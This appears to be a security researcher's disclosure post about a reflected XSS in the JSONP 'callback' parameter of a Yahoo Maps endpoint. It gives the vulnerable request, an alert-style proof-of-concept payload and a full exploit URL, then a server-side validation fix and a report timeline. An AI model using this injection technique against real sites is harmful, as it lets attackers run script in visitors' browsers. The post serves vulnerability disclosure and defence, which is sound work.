This bug was valid for 24 days. Later it turned out to be a duplicate (#@&!).
After typing some text into the search box (e.g. “New York, NY”) and clicking the “Search Maps” button, there is a GET request to gws2.maps.yahoo.com:
GET /onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=mycjson14 HTTP/1.1
The “callback” parameter is vulnerable to JavaScript injection, for example with the following payload:
alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));
You can see the effect by visiting the following link:
http://gws2.maps.yahoo.com/onebox?obq=New%20York%2C%20NY&flags=JX&appid=ymapsaura2&local_count=10&userLat=52.235352&userLon=21.00939&obd=pt&obflags=D&callback=alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));
This content is then executed in the context of maps.yahoo.com.
The XSS is exploitable only by visiting maps.yahoo.com and modifying the request to gws2.maps.yahoo.com (or through another website that embeds a request to the vulnerable URL).
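The root cause here is a JSONP endpoint that echoes the “callback” parameter into a JavaScript response without restricting it to a function name. The following is an added example of the server-side fix (written for this post, not Yahoo's code, and the function names `isSafeJsonpCallback` and `buildJsonpResponse` are my own): the callback value is accepted only if it is a plain, optionally dotted JavaScript identifier, so a value containing parentheses, quotes or statement separators is rejected before it reaches the response body.

```javascript
// Added example (not Yahoo's code): server-side validation of a JSONP
// callback parameter, the class of bug described in this post.
// Only a plain JavaScript identifier, optionally dotted (e.g. "ns.cb1"),
// is accepted; anything containing parentheses, quotes, semicolons or
// other characters is rejected so it cannot form a script statement.
const SAFE_CALLBACK = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function isSafeJsonpCallback(name) {
  return typeof name === 'string' && name.length <= 64 && SAFE_CALLBACK.test(name);
}

// Builds the JSONP response body for a validated callback name, or
// returns null when the name fails validation (the caller should then
// answer with HTTP 400 instead of echoing the parameter back).
function buildJsonpResponse(callback, payload) {
  if (!isSafeJsonpCallback(callback)) return null;
  // JSON.stringify output is safe inside a JS call expression once the
  // U+2028/U+2029 line terminators are escaped.
  const json = JSON.stringify(payload)
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
  // The leading "/**/" prefix is the usual guard against content sniffing
  // tricks; the caller should also send Content-Type: application/javascript
  // and X-Content-Type-Options: nosniff.
  return `/**/${callback}(${json});`;
}

// Constructed sample inputs: the legitimate callback name seen in the
// request on this page and the injected value from the proof of concept.
const LEGIT_CALLBACK = 'mycjson14';
const INJECTED_CALLBACK =
  'alert(String.fromCharCode(34,104,116,116,112,58,47,47,108,117,98,105,46,99,122,34));';

// Demo when run directly: the legitimate name yields a response body,
// the injected one is rejected (null).
console.log(buildJsonpResponse(LEGIT_CALLBACK, { obq: 'New York, NY' }));
console.log(buildJsonpResponse(INJECTED_CALLBACK, { obq: 'New York, NY' }));
```

With this check in place the request from the post would still work as intended (the response becomes `/**/mycjson14({...});`), while the injected callback never reaches the response body, so there is nothing for the browser to execute in the maps.yahoo.com origin.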
Timeline:
[February 2nd 2014] - bug was reported
[March 5th 2014] - bug was marked as a duplicate
P.S. No screenshots this time; please enjoy the video:
https://www.youtube.com/watch?v=PETcfv68lM0